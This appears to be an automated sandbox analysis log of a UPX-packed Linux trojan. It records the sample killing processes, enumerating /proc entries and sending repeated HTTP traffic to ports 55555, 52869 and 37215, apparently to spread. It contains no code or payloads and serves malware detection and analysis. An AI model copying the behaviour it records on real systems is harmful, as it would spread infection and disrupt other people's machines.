Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2102, result: successful

Source: classification engine

Classification label: mal92.spre.troj.evad.lin@0/0@0/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1582/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2033/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1612/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1579/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1699/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1335/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1698/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2028/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1334/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1576/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2025/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/910/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/912/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/912/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/759/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/759/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/517/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/918/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/918/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1594/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1349/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1623/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/761/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/761/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1622/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/884/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/884/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1983/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2038/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1344/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1465/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1586/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1860/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1463/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/800/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/800/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/801/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/801/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1629/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1627/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1900/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/491/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/491/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2050/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1877/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/772/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/772/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1633/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1599/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1632/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/774/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/774/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1477/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/654/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/896/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1476/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1872/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2048/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/655/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1475/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/777/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/777/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/656/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/657/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/658/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/658/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/936/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/936/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/419/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1639/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1638/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1809/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1494/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1890/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2063/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2062/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1888/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1886/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/420/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1489/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/785/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/785/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1642/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/667/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/788/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/788/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/789/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/789/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1648/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2078/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2077/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/2074/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/670/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/793/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/793/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1656/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1654/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/674/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/1532/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/675/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/796/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/796/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/676/exe
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/797/fd
Source: /tmp/NE8O7liu0s (PID: 6243)	File opened: /proc/797/exe

Source: /usr/bin/xfce4-session (PID: 6313)

Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 50884 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42472 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55700 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43676 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35476 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36744 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35856 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60752 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55400 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54402 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 59474 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44500 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58624 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36698 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58624 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36698 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58624 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36698 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46846 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46846 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46846 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58624 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36698 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46846 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56854 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56854 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56854 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42616 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44990 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56854 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52648 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39632 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40968 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58624 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40968 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 39632 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 39632 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40968 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36698 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39632 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40968 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38932 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50286 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 59682 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 50286
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51154 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51806 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46798 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55754 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54104 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55038 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51830 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51830 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58624 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51830 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51830 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36698 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33602 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33602 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33602 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41092 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44294 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35882 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 44294
Source: unknown	Network traffic detected: HTTP traffic on port 44434 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37618 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35882 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33602 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35882 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43112 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43112 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43112 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35882 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43112 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46612 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41686 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33602 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40532 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50994 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33428 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56166 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50994 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33428 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50994 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33428 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40532 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53814 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50964 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51766 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53954 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56708 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48418 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48418 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33428 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50994 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40532 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48418 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57846 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43870 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58500 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52696 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51734 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48418 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57846 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60836 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47946 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60836 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40532 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57846 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60836 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58624 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60836 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57846 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33602 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46984 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38464 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 59182 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42512 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54034 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36698 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41926 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 41926
Source: unknown	Network traffic detected: HTTP traffic on port 56808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40532 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46254 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57120 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41504 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57040 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41504 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 57040
Source: unknown	Network traffic detected: HTTP traffic on port 46254 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41504 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46254 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57846 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57964 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40452 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41504 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57964 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40452 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57964 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40452 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46254 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57964 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40452 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36514 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56844 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34140 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36514 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36514 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46254 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54694 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58084 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53150 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36514 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58084 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53150 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36722 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58084 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40532 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53150 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57846 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44258 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 39256 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45448 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58084 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53150 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40696 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38640 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36514 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44060 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46254 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44060 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44060 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58084 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53150 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44060 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33602 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54716 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54606 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41246 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45064 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57236 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45064 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57236 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45064 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57236 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45064 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57236 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44592 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36514 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51708 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40816 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41142 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 40816
Source: unknown	Network traffic detected: HTTP traffic on port 40406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42856 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41142 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41142 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58084 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53150 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41142 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51332 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52802 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57516 -> 55555
